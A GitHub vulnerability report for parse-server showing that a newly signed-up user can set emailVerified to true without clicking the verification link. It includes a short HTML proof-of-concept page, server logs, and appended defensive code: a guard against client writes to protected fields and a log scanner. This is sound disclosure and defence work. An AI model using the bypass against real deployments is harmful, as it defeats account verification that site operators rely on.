
Vulnerability: Email verification can be circumvented #3393

Closed
@haapaan

Description

A user who has just signed up can set emailVerified=true without actually verifying the email address. In other words, the user does not have to click the link in the email to get his/her email validated.

Steps to reproduce

Steps that reproduce the issue:

  1. Set the following settings in the server.js:
    verifyUserEmails: true,
    emailVerifyTokenValidityDuration: 2 * 60 * 60,
    preventLoginWithUnverifiedEmail: true,

  2. Sign up, set emailVerified: true and save the user. Here is a sample HTML page that does just that:

<html>
<head>
<script type="text/javascript" src="https://npmcdn.com/parse/dist/parse.js"></script>
<script type="text/javascript">
function signupAndSetEmailVerified()
{
    Parse.initialize('e5c10b31d8716509af3e571260');
    Parse.serverURL = 'http://127.0.0.1:8888/parse';

    var user = new Parse.User();
    user.set("username", "hacker");
    user.set("password", "passwd");
    user.set("email", "[email protected]");

    user.signUp(null, {
        success: function(user) {
            // Signup succeeded
            alert("Signup succeeded");
            // Try hack emailVerified to true (should not succeed)
            user.set("emailVerified", true);
            user.save(null, {
                success: function(userAgain) {
                    // Execute any logic that should take place after the object is saved.
                    alert('Save succeeded');
                },
                error: function(userAgain, error) {
                    alert('Save failed with ' + error.message);
                }
            });
        },
        error: function(user, error) {
            // Show the error message somewhere and let the user try again.
            alert("Error: " + error.code + "\n\nwhat is the error \n\n " + error.message);
        }
    });
}
</script>
</head>
<body onload="signupAndSetEmailVerified()">
</body>
</html>

Expected Results

Save should fail or at least emailVerified should still be false in the database for this user.

Actual Outcome

emailVerified is true in the database for this new user.

Environment Setup

  • Server

    • parse-server version (Be specific! Don't say 'latest'.) : 2.3.2
    • Operating System: Ubuntu 14.04.5 LTS (running on VirtualBox virtual machine)
    • Hardware: EliteBook 8470p running VirtualBox Version 5.0.30 r112061
    • Localhost or remote server? (AWS, Heroku, Azure, Digital Ocean, etc): localhost
  • Database

    • MongoDB version: v3.0.9. This issue is also reproducible with PostgreSQL 9.4.
    • Storage engine: default
    • Hardware: EliteBook 8470p running VirtualBox Version 5.0.30 r112061
    • Localhost or remote server? (AWS, mLab, ObjectRocket, Digital Ocean, etc): localhost

Logs/Trace

verbose: REQUEST for [POST] /parse/users: {
"username": "hacker",
"password": "",
"email": "[email protected]"
} method=POST, url=/parse/users, host=127.0.0.1:1337, user-agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0, accept=text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8, accept-language=en-US,en;q=0.5, accept-encoding=gzip, deflate, content-type=text/plain, origin=null, x-forwarded-for=10.0.2.2, x-forwarded-host=127.0.0.1:8888, x-forwarded-server=localhost, connection=Keep-Alive, content-length=214, username=hacker, password=
, email=[email protected]
verbose: RESPONSE from [POST] /parse/users: {
"status": 201,
"response": {
"objectId": "cyl7z1XcSe",
"createdAt": "2017-01-18T12:16:05.861Z",
"sessionToken": "r:c54acc4bbcf051b306c7d0f8d4982646"
},
"location": "http://127.0.0.1:8888/parse/users/cyl7z1XcSe"
} status=201, objectId=cyl7z1XcSe, createdAt=2017-01-18T12:16:05.861Z, sessionToken=r:c54acc4bbcf051b306c7d0f8d4982646, location=http://127.0.0.1:8888/parse/users/cyl7z1XcSe
verbose: REQUEST for [PUT] /parse/classes/_User/cyl7z1XcSe: {
"emailVerified": true
} method=PUT, url=/parse/classes/_User/cyl7z1XcSe, host=127.0.0.1:1337, user-agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0, accept=text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8, accept-language=en-US,en;q=0.5, accept-encoding=gzip, deflate, content-type=text/plain, origin=null, x-forwarded-for=10.0.2.2, x-forwarded-host=127.0.0.1:8888, x-forwarded-server=localhost, connection=Keep-Alive, content-length=235, emailVerified=true
verbose: RESPONSE from [PUT] /parse/classes/_User/cyl7z1XcSe: {
"response": {
"updatedAt": "2017-01-18T12:16:06.833Z"
}
} updatedAt=2017-01-18T12:16:06.833Z
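The report shows a classic mass-assignment problem: a server-managed field (emailVerified) is accepted from an ordinary client write. The following is an added example, not code from this issue or from parse-server, showing the two things a defender wants here: a server-side guard that refuses (or strips) client writes to protected _User fields unless the request carries the master key, and a scanner over the verbose log format shown above that flags such writes after the fact. The `write` object shape, the `PROTECTED_USER_FIELDS` set and the sample log lines are assumptions constructed for the example; `request.master` and `request.object.dirtyKeys()` in the commented Cloud Code wiring are real Parse SDK members, but that hook is not executed here.

```javascript
'use strict';

// Fields on _User that only a master-key request may write. emailVerified is
// the field from this report; add any other server-managed field here.
const PROTECTED_USER_FIELDS = new Set(['emailVerified']);

// Decide whether one write to _User may proceed. `write` is a plain object
// standing in for the Cloud Code beforeSave request (hypothetical shape):
//   { master: boolean, body: { field: value, ... } }
// where body is the JSON the client sent (the PUT body in the logs above).
// mode 'reject' refuses the whole write; mode 'strip' drops the protected
// keys and lets the rest through.
function checkUserWrite(write, { mode = 'reject' } = {}) {
  if (write.master) return { allowed: true, body: write.body };
  const offending = Object.keys(write.body).filter((k) => PROTECTED_USER_FIELDS.has(k));
  if (offending.length === 0) return { allowed: true, body: write.body };
  if (mode === 'strip') {
    const body = Object.fromEntries(
      Object.entries(write.body).filter(([k]) => !PROTECTED_USER_FIELDS.has(k)));
    return { allowed: true, body, stripped: offending };
  }
  return { allowed: false, reason: `clients may not set ${offending.join(', ')}` };
}

// How the guard would be wired into Cloud Code (parse-server API, shown for
// reference only; request.master and dirtyKeys() exist in the SDK, the hook
// body is this example's):
//
// Parse.Cloud.beforeSave(Parse.User, (request) => {
//   const body = {};
//   for (const k of request.object.dirtyKeys()) body[k] = request.object.get(k);
//   const verdict = checkUserWrite({ master: request.master, body });
//   if (!verdict.allowed) throw new Error(verdict.reason);
// });

// Detection side. The verbose log records each request as a
// "REQUEST for [METHOD] url: {json}" entry whose JSON spans several lines
// and is followed by a flattened trailer. Strip the ANSI colour codes, cut
// the log into entries, and pull method, url and body out of each.
function parseRequests(logText) {
  const plain = logText.replace(/\x1b\[\d+m/g, '');
  const entries = [];
  for (const chunk of plain.split(/^(?=verbose: )/m)) {
    const m = chunk.match(/^verbose: REQUEST for \[(\w+)\] (\S+): (\{[\s\S]*?\n\})/);
    if (!m) continue;
    let body;
    try { body = JSON.parse(m[3]); } catch (e) { continue; } // unparsable body: skip
    entries.push({ method: m[1], url: m[2], body });
  }
  return entries;
}

// A client write to a _User object that names a protected field is the
// signature of this issue: flag it.
function findProtectedFieldWrites(logText) {
  return parseRequests(logText).filter((r) =>
    /^\/parse\/(classes\/_User|users)\//.test(r.url) &&
    Object.keys(r.body).some((k) => PROTECTED_USER_FIELDS.has(k)));
}

// Constructed sample in the page's log format (objectId taken from the report;
// the e-mail address is made up).
const SAMPLE_LOG = [
  '\x1b[36mverbose\x1b[39m: REQUEST for [POST] /parse/users: {',
  '"username": "hacker",',
  '"password": "",',
  '"email": "hacker@example.test"',
  '} method=POST, url=/parse/users, host=127.0.0.1:1337, username=hacker, password=',
  ', email=hacker@example.test',
  '\x1b[36mverbose\x1b[39m: RESPONSE from [POST] /parse/users: {',
  '"status": 201',
  '} status=201',
  '\x1b[36mverbose\x1b[39m: REQUEST for [PUT] /parse/classes/_User/cyl7z1XcSe: {',
  '"emailVerified": true',
  '} method=PUT, url=/parse/classes/_User/cyl7z1XcSe, emailVerified=true',
  '\x1b[36mverbose\x1b[39m: RESPONSE from [PUT] /parse/classes/_User/cyl7z1XcSe: {',
  '"response": {',
  '"updatedAt": "2017-01-18T12:16:06.833Z"',
  '}',
  '} updatedAt=2017-01-18T12:16:06.833Z',
].join('\n');

// Run the guard over the same PUT body a client would send, then scan the log.
console.log(checkUserWrite({ master: false, body: { emailVerified: true } }));
console.log(findProtectedFieldWrites(SAMPLE_LOG));
```

In 'reject' mode the save fails loudly, which matches the reporter's expected result; 'strip' mode silently keeps emailVerified at its stored value, which is the quieter choice when existing clients may send the field by accident. Either way the verification-link handler, which runs with the master key, still gets through.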
